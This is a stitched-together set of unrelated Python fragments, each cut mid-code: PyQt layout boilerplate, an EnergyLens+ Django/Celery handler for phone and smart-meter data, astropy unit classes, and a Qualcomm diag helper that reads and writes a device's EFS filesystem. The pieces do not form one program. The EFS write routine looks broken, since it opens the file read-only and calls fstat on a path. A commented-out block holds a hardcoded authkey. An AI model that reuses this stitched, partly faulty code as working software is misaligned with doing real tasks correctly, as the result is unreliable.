self.gridLayout_48.setObjectName("gridLayout_48")
self.tabWidget_2 = QtWidgets.QTabWidget(self.pins)
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.gridLayout_122 = QtWidgets.QGridLayout(self.tab_4)
self.gridLayout_122.setContentsMargins(8, 8, 8, 8)
self.gridLayout_122.setSpacing(5)
self.gridLayout_122.setObjectName("gridLayout_122")
self.gridGroupBox_3 = QtWidgets.QGroupBox(self.tab_4)
self.gridGroupBox_3.setObjectName("gridGroupBox_3")
self.gridLayout_44 = QtWidgets.QGridLayout(self.gridGroupBox_3)
self.gridLayout_44.setContentsMargins(8, 8, 8, 8)
self.gridLayout_44.setSpacing(5)
self.gridLayout_44.setObjectName("gridLayout_44")
self.label_363 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_363.setObjectName("label_363")
self.gridLayout_44.addWidget(self.label_363, 2, 0, 1, 1)
self.label_364 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_364.setObjectName("label_364")
self.gridLayout_44.addWidget(self.label_364, 0, 0, 1, 1)
self.label_365 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_365.setObjectName("label_365")
self.gridLayout_44.addWidget(self.label_365, 8, 0, 1, 1)
self.label_366 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_366.setObjectName("label_366")
self.gridLayout_44.addWidget(self.label_366, 5, 0, 1, 1)
self.label_367 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_367.setObjectName("label_367")
self.gridLayout_44.addWidget(self.label_367, 15, 0, 1, 1)
self.label_368 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_368.setObjectName("label_368")
self.gridLayout_44.addWidget(self.label_368, 4, 0, 1, 1)
self.label_369 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_369.setObjectName("label_369")
self.gridLayout_44.addWidget(self.label_369, 11, 0, 1, 1)
self.label_370 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_370.setObjectName("label_370")
self.gridLayout_44.addWidget(self.label_370, 9, 0, 1, 1)
self.label_371 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_371.setObjectName("label_371")
self.gridLayout_44.addWidget(self.label_371, 13, 0, 1, 1)
self.label_372 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_372.setObjectName("label_372")
self.gridLayout_44.addWidget(self.label_372, 16, 0, 1, 1)
self.label_373 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_373.setObjectName("label_373")
self.gridLayout_44.addWidget(self.label_373, 6, 0, 1, 1)
self.label_374 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_374.setObjectName("label_374")
self.gridLayout_44.addWidget(self.label_374, 12, 0, 1, 1)
self.label_375 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_375.setObjectName("label_375")
self.gridLayout_44.addWidget(self.label_375, 1, 0, 1, 1)
self.label_376 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_376.setObjectName("label_376")
self.gridLayout_44.addWidget(self.label_376, 10, 0, 1, 1)
self.label_377 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_377.setObjectName("label_377")
self.gridLayout_44.addWidget(self.label_377, 3, 0, 1, 1)
self.label_378 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_378.setObjectName("label_378")
self.gridLayout_44.addWidget(self.label_378, 17, 0, 1, 1)
self.label_379 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_379.setObjectName("label_379")
self.gridLayout_44.addWidget(self.label_379, 18, 0, 1, 1)
self.label_380 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_380.setObjectName("label_380")
self.gridLayout_44.addWidget(self.label_380, 19, 0, 1, 1)
self.label_381 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_381.setObjectName("label_381")
self.gridLayout_44.addWidget(self.label_381, 20, 0, 1, 1)
self.label_382 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_382.setObjectName("label_382")
self.gridLayout_44.addWidget(self.label_382, 21, 0, 1, 1)
self.label_383 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_383.setObjectName("label_383")
self.gridLayout_44.addWidget(self.label_383, 22, 0, 1, 1)
self.label_384 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_384.setObjectName("label_384")
self.gridLayout_44.addWidget(self.label_384, 23, 0, 1, 1)
self.label_385 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_385.setObjectName("label_385")
self.gridLayout_44.addWidget(self.label_385, 14, 0, 1, 1)
self.label_386 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_386.setObjectName("label_386")
self.gridLayout_44.addWidget(self.label_386, 7, 0, 1, 1)
self.label_387 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_387.setObjectName("label_387")
self.gridLayout_44.addWidget(self.label_387, 0, 1, 1, 1)
self.label_388 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_388.setObjectName("label_388")
self.gridLayout_44.addWidget(self.label_388, 1, 1, 1, 1)
self.label_389 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_389.setObjectName("label_389")
self.gridLayout_44.addWidget(self.label_389, 2, 1, 1, 1)
self.label_390 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_390.setObjectName("label_390")
self.gridLayout_44.addWidget(self.label_390, 3, 1, 1, 1)
self.label_391 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_391.setObjectName("label_391")
self.gridLayout_44.addWidget(self.label_391, 4, 1, 1, 1)
self.label_392 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_392.setObjectName("label_392")
self.gridLayout_44.addWidget(self.label_392, 5, 1, 1, 1)
self.label_393 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_393.setObjectName("label_393")
self.gridLayout_44.addWidget(self.label_393, 6, 1, 1, 1)
self.label_394 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_394.setObjectName("label_394")
self.gridLayout_44.addWidget(self.label_394, 7, 1, 1, 1)
self.label_395 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_395.setObjectName("label_395")
self.gridLayout_44.addWidget(self.label_395, 8, 1, 1, 1)
self.label_396 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_396.setObjectName("label_396")
self.gridLayout_44.addWidget(self.label_396, 9, 1, 1, 1)
self.label_397 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_397.setObjectName("label_397")
self.gridLayout_44.addWidget(self.label_397, 10, 1, 1, 1)
self.label_398 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_398.setObjectName("label_398")
self.gridLayout_44.addWidget(self.label_398, 11, 1, 1, 1)
self.label_399 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_399.setObjectName("label_399")
self.gridLayout_44.addWidget(self.label_399, 12, 1, 1, 1)
self.label_400 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_400.setObjectName("label_400")
self.gridLayout_44.addWidget(self.label_400, 13, 1, 1, 1)
self.label_401 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_401.setObjectName("label_401")
self.gridLayout_44.addWidget(self.label_401, 14, 1, 1, 1)
self.label_402 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_402.setObjectName("label_402")
self.gridLayout_44.addWidget(self.label_402, 15, 1, 1, 1)
self.label_403 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_403.setObjectName("label_403")
self.gridLayout_44.addWidget(self.label_403, 16, 1, 1, 1)
self.label_404 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_404.setObjectName("label_404")
self.gridLayout_44.addWidget(self.label_404, 17, 1, 1, 1)
self.label_405 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_405.setObjectName("label_405")
self.gridLayout_44.addWidget(self.label_405, 18, 1, 1, 1)
self.label_406 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_406.setObjectName("label_406")
self.gridLayout_44.addWidget(self.label_406, 19, 1, 1, 1)
self.label_407 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_407.setObjectName("label_407")
self.gridLayout_44.addWidget(self.label_407, 20, 1, 1, 1)
self.label_408 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_408.setObjectName("label_408")
self.gridLayout_44.addWidget(self.label_408, 21, 1, 1, 1)
self.label_409 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_409.setObjectName("label_409")
self.gridLayout_44.addWidget(self.label_409, 22, 1, 1, 1)
self.label_410 = QtWidgets.QLabel(self.gridGroupBox_3)
self.label_410.setObjectName("label_410")
self.gridLayout_44.addWidget(self.label_410, 23, 1, 1, 1)
self.gridLayout_122.addWidget(self.gridGroupBox_3, 0, 2, 1, 1)
self.gridGroupBox_5 = QtWidgets.QGroupBox(self.tab_4)
self.gridGroupBox_5.setObjectName("gridGroupBox_5")
self.gridLayout_121 = QtWidgets.QGridLayout(self.gridGroupBox_5)
self.gridLayout_121.setContentsMargins(8, 8, 8, 8)
self.gridLayout_121.setSpacing(5)
| |
<gh_stars>0
"""
[CONSUMER] Processes the data generated by the producer
1. Detect edges in real-time over streaming power data
2. Initiates the classification pipeline
3. Detects wastage/usage
4. Sends real-time feedback to user
"""
from __future__ import absolute_import
from energylenserver.setup_django_envt import *
import os
import csv
import time
import math
import random
import string
from types import NoneType
from datetime import timedelta
import pandas as pd
import datetime as dt
from multiprocessing.managers import BaseManager
from django.conf import settings
from celery import shared_task
from django_pandas.io import read_frame
"""
Imports from EnergyLens+
"""
# DB Imports
from energylenserver.models.models import *
from energylenserver.models.DataModels import *
from energylenserver.models import functions as mod_func
# Core Algo imports
from energylenserver.core import classifier
from energylenserver.core.constants import wastage_threshold, upload_interval, no_test_data
from energylenserver.core import functions as core_f
from energylenserver.meter import edge_detection
from energylenserver.core import user_attribution as attrib
from energylenserver.core import apportionment as apprt
from energylenserver.meter import edge_matching as e_match
from energylenserver.core.functions import exists_in_metadata
# GCM Client imports
from energylenserver.gcmxmppclient.messages import create_message
# Reporting API imports
from energylenserver.api import reporting as rpt
# Common imports
from energylenserver.common_imports import *
from energylenserver.constants import apt_no_list
# Enable Logging
upload_logger = logging.getLogger('energylensplus_upload')
logger = logging.getLogger('energylensplus_django')
elogger = logging.getLogger('energylensplus_error')
meter_logger = logging.getLogger('energylensplus_meterdata')
# Global variables
base_dir = settings.BASE_DIR
dst_folder = os.path.join(base_dir, 'energylenserver/data/phone/')
# Offline Processing imports
from energylenserver.common_offline import *
# Model mapping with filenames
FILE_MODEL_MAP = {
'wifi': (WiFiTestData, "WiFiTestData"),
'rawaudio': (RawAudioTestData, "RawAudioTestData"),
'audio': (MFCCFeatureTestSet, "MFCCFeatureTestSet"),
'accelerometer': (AcclTestData, "AcclTestData"),
'light': (LightTestData, "LightTestData"),
'mag': (MagTestData, "MagTestData"),
'Trainingwifi': (WiFiTrainData, "WiFiTrainData"),
'Trainingrawaudio': (RawAudioTrainData, "RawAudioTrainData"),
'Trainingaudio': (MFCCFeatureTrainSet, "MFCCFeatureTrainSet"),
'Trainingaccelerometer': (AcclTrainData, "AcclTrainData"),
'Traininglight': (LightTrainData, "LightTrainData"),
'Trainingmag': (MagTrainData, "MagTrainData")
}
class ClientManager(BaseManager):
pass
'''
# Commented for offline processing
# Establishing connection with the running GCM Server
try:
ClientManager.register('get_client_obj')
manager = ClientManager(address=('localhost', 65000), authkey='abracadabra')
manager.connect()
client = manager.get_client_obj()
if client is None or client == "":
logger.debug("GCM Client not connected")
else:
logger.debug("Got the GCM Client: client obj type:: %s", type(client))
except Exception, e:
elogger.error("[InternalGCMClientConnectionException] %s", e)
'''
"""
Helper functions
"""
def create_file(filename):
if not os.path.isfile(filename):
with open(filename, "w+") as myfile:
writer = csv.writer(myfile)
writer.writerow(["timestamp", "filename"])
def write_to_file(filename, data):
with open(filename, "a+") as myfile:
writer = csv.writer(myfile)
writer.writerow(data)
"""
Data Handlers
"""
@shared_task
def phoneDataHandler(filename, sensor_name, filepath, training_status, user):
"""
Consumes sensor data streams from the phone
Performs some preprocessing and inserts records
into the database
:param filename:
:param sensor_name:
:param df_csv:
:param training_status:
:param user:
:return upload status:
"""
try:
filepath_full = os.path.join(dst_folder, "data_tracker.csv")
now_time = time.time()
# Check existence of data file tracker and act accordingly
if os.path.isfile(filepath_full):
ftracker_df = pd.read_csv(filepath_full)
if len(ftracker_df) > 0:
flag = False
# Don't go ahead if file already been dealt with
if filename in ftracker_df.filename.tolist():
flag = True
logger.debug("File %s already inserted in the database!", filename)
# Create new file if entries older than 5 days
start_timestamp = ftracker_df.ix[0]['timestamp']
if now_time - start_timestamp >= 5 * 24 * 3600:
# new_file = os.path.join(dst_folder,
# "prev_data_tracker_" + str(int(now_time)) + "_.csv")
# Delete the tracker file
try:
os.unlink(filepath_full)
except Exception, e:
logger.error("Deletion of tracker file failed ::%s", e)
# Create new file
create_file(filepath_full)
if flag:
os.remove(filepath)
return
else:
create_file(filepath_full)
# Create a dataframe for preprocessing
if sensor_name != 'rawaudio':
try:
df_csv = pd.read_csv(filepath)
except Exception, e:
logger.error("[InsertDataException]::%s", str(e))
os.remove(filepath)
return
# Remove rows with 'Infinity' in MFCCs created
if sensor_name == 'audio':
if str(df_csv.mfcc1.dtype) != 'float64':
df_csv = df_csv[df_csv.mfcc1 != '-Infinity']
if sensor_name != 'rawaudio':
# logger.debug("Total number of records to insert: %d", len(df_csv))
# Remove NAN timestamps
df_csv.dropna(subset=[0], inplace=True)
# Create temp csv file
os.remove(filepath)
df_csv.to_csv(filepath, index=False)
# --Initialize Model--
if training_status is True:
model = FILE_MODEL_MAP['Training' + sensor_name]
else:
model = FILE_MODEL_MAP[sensor_name]
# --Store data in the model--
model[0]().insert_records(user, filepath, model[1])
# Add an entry to the db -- to prevent data duplication
record = [now_time, filename]
write_to_file(filepath_full, record)
logger.debug("FILE:: %s", filename)
'''
if sensor_name != 'rawaudio':
logger.debug("FILE:: %s", filename)
if len(df_csv) > 0:
logger.debug("%s[%s] -- [%s]", sensor_name,
time.ctime(df_csv.ix[df_csv.index[0]]['time'] / 1000),
time.ctime(df_csv.ix[df_csv.index[-1]]['time'] / 1000))
else:
logger.debug("%s empty!!", filename)
else:
logger.debug("FILE:: %s", filename)
'''
# Classify location
if sensor_name == 'wifi' and training_status is False:
logger.debug("Classifying new data for: %s with filename: %s", sensor_name, filename)
start_time = df_csv.ix[df_csv.index[0]]['time']
end_time = df_csv.ix[df_csv.index[-1]]['time']
location = classifier.localize_new_data(user.apt_no, start_time, end_time, user)
logger.debug("%s is in %s", user.name, location)
upload_logger.debug("Successful Upload! File: %s", filename)
except Exception, e:
if "No such file or directory" in str(e):
logger.error("[PhoneDataHandlerException]:: %s", e)
else:
logger.exception("[PhoneDataHandlerException]:: %s", e)
@shared_task
def meterDataHandler(df, file_path):
"""
Consumes sensor data streams from the meter
"""
meter_uuid_folder = os.path.dirname(file_path)
uuid = meter_uuid_folder.split('/')[-1]
# Start the process only if participants are registered
try:
meter = MeterInfo.objects.get(meter_uuid=uuid)
except MeterInfo.DoesNotExist, e:
meter_logger.debug("No registered users for this apartment")
return
apt_no = meter.apt_no
meter_logger.debug("Detecting Edges for Apt:: %s UUID:: %s", apt_no, uuid)
apt_users = mod_func.retrieve_users(apt_no)
if apt_users.count() == 0:
meter_logger.debug("No active users for this apartment")
return
try:
# -- Detect Edge --
edges_df = edge_detection.detect_and_filter_edges(df)
except Exception, e:
meter_logger.exception("[OuterDetectEdgeException]:: %s", str(e))
# -- Store edges into db --
if len(edges_df) == 0:
meter_logger.debug("No edges detected")
return
# For the detected edge, store edge and call classification pipeline task
for idx in edges_df.index:
edge = edges_df.ix[idx]
edge_time = edge.time
magnitude = edge.magnitude
try:
# Edge Filter: Forward edge only it exists in the metadata
data = mod_func.retrieve_metadata(apt_no)
metadata_df = read_frame(data, verbose=False)
in_metadata, matched_md = exists_in_metadata(apt_no, "all", "all",
math.fabs(magnitude),
metadata_df,
meter_logger, "dummy_user")
if not in_metadata:
meter_logger.debug("Detected edge of magnitude %d ignored", magnitude)
continue
# Check if the edge exists in the database
try:
# Edge Filter: filter periodic edges of similar mag
# Cause: fridge or washing machine
obj = Edges.objects.filter(meter=meter).latest('timestamp')
prev_time = int(obj.timestamp)
prev_mag = math.fabs(obj.magnitude)
diff = prev_mag / math.fabs(magnitude)
if (diff > 0.8 and diff <= 1) and (edge_time - prev_time < 60 and
math.fabs(magnitude) < 600):
continue
record = Edges.objects.get(meter=meter, timestamp=edge_time)
except Edges.DoesNotExist, e:
# --Store edge--
edge_r = Edges(timestamp=int(edge_time), time=dt.datetime.fromtimestamp(edge_time),
magnitude=magnitude, type=edge.type,
curr_power=edge.curr_power, meter=meter)
edge_r.save()
meter_logger.debug("Edge for UUID: %s at [%s] of mag %d", uuid, time.ctime(
edge['time']), edge['magnitude'])
# Initiate classification pipeline
edgeHandler(edge_r)
except Exception, e:
meter_logger.error("[EdgeSaveException]:: %s", str(e))
@shared_task
def edgeHandler(edge):
"""
Starts the classification pipeline and relays edges based on edge type
"""
logger.debug("Starting the Classification pipeline for edge: [%s] :: %d",
time.ctime(edge.timestamp), edge.magnitude)
'''
Commented for offline processing
if edge.type == "falling":
chain = (classify_edge.s(edge) |
find_time_slice.s() | apportion_energy.s())
else:
chain = classify_edge.s(edge)
chain()
'''
if edge.type == "falling":
event_result = classify_edge(edge)
activity_result = find_time_slice(event_result)
apportion_energy(activity_result)
else:
event_result = classify_edge(edge)
# Offline processing - evaluation
logger.debug("Classification Pipeline ended for edge: [%s] :: %d",
time.ctime(edge.timestamp), edge.magnitude)
"""
Invokes the EnergyLens+ core algorithm
"""
@shared_task
def classify_edge(edge):
"""
Consumes smart meter edges and phone data to give out 'who',
'what', 'where' and 'when'
:param edge:
:return "where", what" and "who" labels:
"""
try:
return_error = 'ignore', 'ignore', 'ignore', 'ignore'
apt_no = edge.meter.apt_no
logger.debug("Apt.No.:: %d Classify edge type '%s' [%s] %d",
apt_no, edge.type, time.ctime(edge.timestamp), edge.magnitude)
# Defining event window
p_window = 60 * 2 # window for each side of the event time (in seconds)
event_time = edge.timestamp
magnitude = edge.magnitude
if edge.type == "rising":
event_type = "ON"
start_time = event_time + 60
end_time = start_time + p_window
else:
event_type = "OFF"
start_time = event_time - p_window
end_time = event_time
# --- Preprocessing ---
# Determine user at home
user_list = core_f.determine_user_home_status(start_time, end_time, apt_no)
n_users_at_home = len(user_list)
if n_users_at_home == 0:
logger.debug("No user at home. Ignoring edge activity.")
return return_error
'''
For offline evaluation
'''
run_no = read_run_no()
run_folder = res_folder + "offline/" + run_no
# Creating event log
event_log = run_folder + '/' + str(apt_no) + '_common_eventLog.csv'
missed_status, sp_status = check_spurious_missed_event(apt_no, event_time)
if is_missed_set() and missed_status:
return return_error
details = ''
if sp_status:
reason = 'spurious'
else:
reason = 'correct'
if not os.path.isfile(event_log):
eval_event_df = pd.DataFrame({'id': [0], 'edge_id': [edge.id],
'timestamp': [event_time], 'magnitude': [magnitude],
'event_type': [event_type], 'apt_no': [apt_no],
'location': ['none'], 'appliance': ['none'],
'dev_id': [unknown_id], 'matched': [0],
'reason': [reason], 'details': [details]},
columns=['id', 'edge_id', 'timestamp', 'magnitude',
'event_type', 'apt_no',
'location', 'appliance', 'dev_id',
'matched', 'reason', 'details'])
eval_event_df.to_csv(event_log, index=False)
else:
eval_event_df = pd.read_csv(event_log)
event_i_df = pd.DataFrame({'id': [len(eval_event_df)], 'edge_id': [edge.id],
'timestamp': [event_time], 'magnitude': [magnitude],
'event_type': [event_type], 'apt_no': [apt_no],
'location': ['none'], 'appliance': ['none'],
'dev_id': [unknown_id], 'matched': [0],
'reason': [reason], 'details': [details]},
columns=['id', 'edge_id', 'timestamp', 'magnitude',
'event_type', 'apt_no',
'location', 'appliance', 'dev_id',
'matched', 'reason', 'details'])
eval_event_df = pd.concat([eval_event_df, event_i_df])
eval_event_df.reset_index(drop=True, inplace=True)
eval_event_df.to_csv(event_log, index=False)
'''
# Commented for offline processing
if event_type == "OFF":
now_time = int(time.time())
if (now_time - event_time) <= 2 * 60:
| |
----------
st : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance
The unit that this named unit represents.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to have it
displayed as ``\\Omega`` by the ``latex`` formatter. In that
case, `format` argument should be set to::
{'latex': r'\\Omega'}
namespace : dictionary, optional
When provided, inject the unit (and all of its aliases) into
the given namespace.
Raises
------
ValueError
If any of the given unit names are already in the registry.
ValueError
If any of the given unit names are not valid Python tokens.
"""
def __init__(self, st, represents=None, doc=None,
format=None, namespace=None):
represents = Unit(represents)
self._represents = represents
NamedUnit.__init__(self, st, namespace=namespace, doc=doc,
format=format)
@property
def represents(self):
"""The unit that this named unit represents."""
return self._represents
def decompose(self, bases=set()):
return self._represents.decompose(bases=bases)
def is_unity(self):
return self._represents.is_unity()
def __hash__(self):
return hash(self.name) + hash(self._represents)
@classmethod
def _from_physical_type_id(cls, physical_type_id):
# get string bases and powers from the ID tuple
bases = [cls(base) for base, _ in physical_type_id]
powers = [power for _, power in physical_type_id]
if len(physical_type_id) == 1 and powers[0] == 1:
unit = bases[0]
else:
unit = CompositeUnit(1, bases, powers)
return unit
class PrefixUnit(Unit):
"""
A unit that is simply a SI-prefixed version of another unit.
For example, ``mm`` is a `PrefixUnit` of ``.001 * m``.
The constructor is the same as for `Unit`.
"""
class CompositeUnit(UnitBase):
"""
Create a composite unit using expressions of previously defined
units.
Direct use of this class is not recommended. Instead use the
factory function `Unit` and arithmetic operators to compose
units.
Parameters
----------
scale : number
A scaling factor for the unit.
bases : sequence of `UnitBase`
A sequence of units this unit is composed of.
powers : sequence of numbers
A sequence of powers (in parallel with ``bases``) for each
of the base units.
"""
def __init__(self, scale, bases, powers, decompose=False,
decompose_bases=set(), _error_check=True):
# There are many cases internal to astropy.units where we
# already know that all the bases are Unit objects, and the
# powers have been validated. In those cases, we can skip the
# error checking for performance reasons. When the private
# kwarg `_error_check` is False, the error checking is turned
# off.
if _error_check:
scale = sanitize_scale(scale)
for base in bases:
if not isinstance(base, UnitBase):
raise TypeError(
"bases must be sequence of UnitBase instances")
powers = [validate_power(p) for p in powers]
self._scale = scale
self._bases = bases
self._powers = powers
self._decomposed_cache = None
self._expand_and_gather(decompose=decompose, bases=decompose_bases)
self._hash = None
def __repr__(self):
if len(self._bases):
return super().__repr__()
else:
if self._scale != 1.0:
return 'Unit(dimensionless with a scale of {0})'.format(
self._scale)
else:
return 'Unit(dimensionless)'
def __hash__(self):
if self._hash is None:
parts = ([str(self._scale)] +
[x.name for x in self._bases] +
[str(x) for x in self._powers])
self._hash = hash(tuple(parts))
return self._hash
@property
def scale(self):
"""
Return the scale of the composite unit.
"""
return self._scale
@property
def bases(self):
"""
Return the bases of the composite unit.
"""
return self._bases
@property
def powers(self):
"""
Return the powers of the composite unit.
"""
return self._powers
def _expand_and_gather(self, decompose=False, bases=set()):
def add_unit(unit, power, scale):
if unit not in bases:
for base in bases:
try:
scale *= unit._to(base) ** power
except UnitsError:
pass
else:
unit = base
break
if unit in new_parts:
a, b = resolve_fractions(new_parts[unit], power)
new_parts[unit] = a + b
else:
new_parts[unit] = power
return scale
new_parts = {}
scale = self.scale
for b, p in zip(self.bases, self.powers):
if decompose and b not in bases:
b = b.decompose(bases=bases)
if isinstance(b, CompositeUnit):
scale *= b._scale ** p
for b_sub, p_sub in zip(b._bases, b._powers):
a, b = resolve_fractions(p_sub, p)
scale = add_unit(b_sub, a * b, scale)
else:
scale = add_unit(b, p, scale)
new_parts = [x for x in new_parts.items() if x[1] != 0]
new_parts.sort(key=lambda x: (-x[1], getattr(x[0], 'name', '')))
self._bases = [x[0] for x in new_parts]
self._powers = [validate_power(x[1]) for x in new_parts]
self._scale = sanitize_scale(scale)
def __copy__(self):
"""
For compatibility with python copy module.
"""
return CompositeUnit(self._scale, self._bases[:], self._powers[:])
def decompose(self, bases=set()):
if len(bases) == 0 and self._decomposed_cache is not None:
return self._decomposed_cache
for base in self.bases:
if (not isinstance(base, IrreducibleUnit) or
(len(bases) and base not in bases)):
break
else:
if len(bases) == 0:
self._decomposed_cache = self
return self
x = CompositeUnit(self.scale, self.bases, self.powers, decompose=True,
decompose_bases=bases)
if len(bases) == 0:
self._decomposed_cache = x
return x
def is_unity(self):
unit = self.decompose()
return len(unit.bases) == 0 and unit.scale == 1.0
si_prefixes = [
(['Y'], ['yotta'], 1e24),
(['Z'], ['zetta'], 1e21),
(['E'], ['exa'], 1e18),
(['P'], ['peta'], 1e15),
(['T'], ['tera'], 1e12),
(['G'], ['giga'], 1e9),
(['M'], ['mega'], 1e6),
(['k'], ['kilo'], 1e3),
(['h'], ['hecto'], 1e2),
(['da'], ['deka', 'deca'], 1e1),
(['d'], ['deci'], 1e-1),
(['c'], ['centi'], 1e-2),
(['m'], ['milli'], 1e-3),
(['u'], ['micro'], 1e-6),
(['n'], ['nano'], 1e-9),
(['p'], ['pico'], 1e-12),
(['f'], ['femto'], 1e-15),
(['a'], ['atto'], 1e-18),
(['z'], ['zepto'], 1e-21),
(['y'], ['yocto'], 1e-24)
]
binary_prefixes = [
(['Ki'], ['kibi'], 2. ** 10),
(['Mi'], ['mebi'], 2. ** 20),
(['Gi'], ['gibi'], 2. ** 30),
(['Ti'], ['tebi'], 2. ** 40),
(['Pi'], ['pebi'], 2. ** 50),
(['Ei'], ['exbi'], 2. ** 60)
]
def _add_prefixes(u, excludes=[], namespace=None, prefixes=False):
"""
Set up all of the standard metric prefixes for a unit. This
function should not be used directly, but instead use the
`prefixes` kwarg on `def_unit`.
Parameters
----------
excludes : list of str, optional
Any prefixes to exclude from creation to avoid namespace
collisions.
namespace : dict, optional
When provided, inject the unit (and all of its aliases) into
the given namespace dictionary.
prefixes : list, optional
When provided, it is a list of prefix definitions of the form:
(short_names, long_tables, factor)
"""
if prefixes is True:
prefixes = si_prefixes
elif prefixes is False:
prefixes = []
for short, full, factor in prefixes:
names = []
format = {}
for prefix in short:
if prefix in excludes:
continue
for alias in u.short_names:
names.append(prefix + alias)
# This is a hack to use Greek mu as a prefix
# for some formatters.
if prefix == 'u':
format['latex'] = r'\mu ' + u.get_format_name('latex')
format['unicode'] = 'μ' + u.get_format_name('unicode')
for key, val in u._format.items():
format.setdefault(key, prefix + val)
for prefix in full:
if prefix in excludes:
continue
for alias in u.long_names:
names.append(prefix + alias)
if len(names):
PrefixUnit(names, CompositeUnit(factor, [u], [1],
_error_check=False),
namespace=namespace, format=format)
def def_unit(s, represents=None, doc=None, format=None, prefixes=False,
exclude_prefixes=[], namespace=None):
"""
Factory function for defining new units.
Parameters
----------
s : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance, optional
The unit that this named unit represents. If not provided,
a new `IrreducibleUnit` is created.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to
have it displayed as ``\\Omega`` by the ``latex``
formatter. In that case, `format` argument should be set
to::
{'latex': r'\\Omega'}
prefixes : bool or list, optional
When `True`, generate all of the SI prefixed versions of the
unit as well. For example, for a given unit ``m``, will
generate ``mm``, ``cm``, ``km``, etc. When a list, it is a list of
prefix definitions of the form:
(short_names, long_tables, factor)
Default is `False`. This function always returns the base
unit object, even if multiple scaled versions of the unit were
created.
exclude_prefixes : list of str, optional
If any of the SI prefixes need to be excluded, they may be
listed here. For example, ``Pa`` can be interpreted either as
"petaannum" or "Pascal". Therefore, when defining | |
only be written. Aborting.")
self.efs_close(efsmethod, fdata)
return 0
num_bytes = 0
offset = 0
fname = srcpath[srcpath.rfind("/") + 1:]
fname = os.path.join(dstpath, fname)
with open(fname, "wb") as write_handle:
dataleft = size
while dataleft > 0:
rsize = dataleft
if rsize > FS_DIAG_MAX_READ_REQ:
rsize = FS_DIAG_MAX_READ_REQ
finfo = self.efs_read(efsmethod, fdata, rsize, offset)
if finfo == -1:
break
fdata, offset, bytes_read, data = finfo
write_handle.write(data)
offset += rsize
dataleft -= rsize
self.efs_close(efsmethod, fdata)
return num_bytes
def efswritefile(self, srcpath, dstpath):
alternateefs = b"\x4B\x3E\x00\x00" + b"\x00" * 0x28
standardefs = b"\x4B\x13\x00\x00" + b"\x00" * 0x28
resp = self.send(alternateefs)
if resp[0] == 0x4B:
efsmethod = 0x3E
else:
resp = self.send(standardefs)
if resp[0] == 0x4B:
efsmethod = 0x13
else:
logging.error("No known efs method detected for reading.")
return 0
with open(srcpath, "rb") as rf:
fdata = self.efs_open(efsmethod, O_RDONLY, 0, srcpath)
if fdata == -1:
return 0
mode, size, nlink, atime, mtime, ctime = self.efs_fstat(efsmethod, fdata)
if size == 0:
self.efs_close(efsmethod, fdata)
return 0
"""
acr=(mode & O_ACCMODE)
if acr==O_RDONLY:
print("File can only be read. Aborting.")
self.efs_close(efsmethod, fdata)
return
"""
num_bytes = 0
offset = 0
size = os.fstat(srcpath).st_size
dataleft = size
while dataleft > 0:
rsize = dataleft
if rsize > FS_DIAG_MAX_READ_REQ:
rsize = FS_DIAG_MAX_READ_REQ
data = rf.read(rsize)
finfo = self.efs_write(efsmethod, fdata, offset, data)
if finfo == -1:
break
fdata, offset, bytes_written = finfo
offset += rsize
dataleft -= rsize
self.efs_close(efsmethod, fdata)
return num_bytes
class DiagTools(metaclass=LogBase):
def run(self, args):
self.interface = -1
self.vid = None
self.pid = None
self.serial = args.serial
if args.portname is not None:
self.portname = args.portname
self.serial = True
else:
self.portname = ""
